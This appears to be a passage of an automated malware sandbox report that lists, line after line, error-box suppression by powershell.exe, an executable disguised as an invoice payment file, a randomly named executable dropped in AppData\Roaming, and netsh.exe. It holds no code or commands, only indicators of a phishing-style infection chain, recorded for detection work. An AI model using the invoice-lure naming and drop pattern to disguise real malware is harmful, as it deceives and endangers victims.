Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice-BL. Payment TT $ 28,945.99.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\SFHAWxtoIpgL.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOOPENFILEERRORBOX
